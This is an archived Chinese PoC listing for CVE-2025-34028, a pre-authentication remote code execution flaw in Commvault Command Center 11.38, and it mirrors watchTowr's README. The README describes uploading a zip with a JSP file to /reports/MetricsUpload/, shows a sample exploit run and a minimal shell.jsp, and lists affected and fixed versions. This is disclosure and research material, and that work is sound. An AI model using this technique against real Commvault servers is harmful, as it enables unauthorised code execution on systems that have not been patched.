POC详情: 70b83bd749c7d62a08d869c66976c2eba5562e76

来源
https://github.com/watchtowrlabs/watchTowr-vs-Commvault-PreAuth-RCE-CVE-2025-34028
关联漏洞
标题: Commvault Command Center 安全漏洞 (CVE-2025-34028)
描述:Commvault Command Center是美国Commvault公司的一个图形化管理界面。 Commvault Command Center 11.38版本存在安全漏洞,该漏洞源于路径遍历漏洞,可能导致远程代码执行。
介绍

# CVE-2025-34028
A Commvault Pre-Authenticated Remote Code Execution Proof of Concept
 
See our [blog post](https://labs.watchtowr.com/) for technical details

# Detection in Action


```
 python watchtowr-vs-commvault-rce-CVE-2025-34028.py --url https://192.168.1.1
                         __         ___  ___________                   
         __  _  ______ _/  |__ ____ |  |_\__    ____\____  _  ________ 
         \ \/ \/ \__  \    ___/ ___\|  |  \|    | /  _ \ \/ \/ \_  __ \
          \     / / __ \|  | \  \___|   Y  |    |(  <_> \     / |  | \/
           \/\_/ (____  |__|  \___  |___|__|__  | \__  / \/\_/  |__|   
                                  \/          \/     \/                            
          
        watchtowr-vs-commvault-rce-CVE-2025-34028.py
        (*) Commvault Unauthenticated Remote Code Execution (CVE-2025-34028) POC by watchTowr
        
          - Sonny , watchTowr (sonny@watchTowr.com)

        CVEs: [CVE-2025-34028]
        
[*] Targeting https://192.168.1.1
[*] Verifying presence of Commvault
[*] Uploading to  /reports/MetricsUpload/2GfMIJdK/
[*] Fetching System User from  https://192.168.1.1/reports/MetricsUpload/2GfMIJdK/.tmp/dist-cc/dist-cc/shell.jsp
[*] System User EC2XXX-XXXXXXX$

```

# Description

This script is a proof of concept for CVE-2025-34028, for Commvault Web Interfaces. By uploading a zip file containing a code execution .jsp file, the zip file is uploaded to a public facing directory and the system user is detailed within the response. More details are described within our [blog post] (https://labs.watchtowr.com/).

# Note
The PoC script uses a hardcoded zip file containing the following files:
* /ccApp/index.html
* shell.jsp

Shell.jsp contents:

```
<%@ page import="java.util.*" %>
<html>
<body>
  <h3>System Information</h3>
  <p>Current User: <%= System.getProperty("user.name") %></p>
</body>
</html>
```

# Affected Versions

* Commvault Windows and Linux 11.38.0 - 11.38.19

# Remediated Versions

* Commvault Windows and Linux 11.38.20 as of April 10, 2025
* Commvault Windows and Linux 11.38.25 as of April 10, 2025

More details at [Commvault Advisory](https://documentation.commvault.com/securityadvisories/CV_2025_04_1.html)


# Follow [watchTowr](https://watchTowr.com) Labs

For the latest security research follow the [watchTowr](https://watchTowr.com) Labs Team 

- https://labs.watchtowr.com/
- https://x.com/watchtowrcyber
文件快照

 [4.0K]  /data/pocs/70b83bd749c7d62a08d869c66976c2eba5562e76
├── [2.4K]  README.md
└── [3.7K]  watchtowr-vs-commvault-rce-CVE-2025-34028.py

0 directories, 2 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。